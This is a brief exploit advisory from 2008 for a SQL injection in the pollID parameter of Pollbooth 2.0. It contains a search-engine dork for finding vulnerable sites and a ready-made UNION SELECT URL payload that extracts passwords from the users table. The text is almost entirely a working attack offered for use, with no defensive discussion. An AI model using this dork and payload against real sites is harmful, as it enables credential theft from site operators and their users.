Pollbooth <= 2.0 (pollID) Remote SQL Injection Vulnerability

2008-04-13
ID: 2873
CVE: None
Download vulnerable application: None
############################################
#
# Pollbooth v2.0 SQL Injection Vulnerability
#
#############################################
#
# DORK 1 : allinurl: "pollBooth.php?op=results"pollID
#
#############################################
EXPLOiT :

pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

*********************************************



1-4-2 (www01)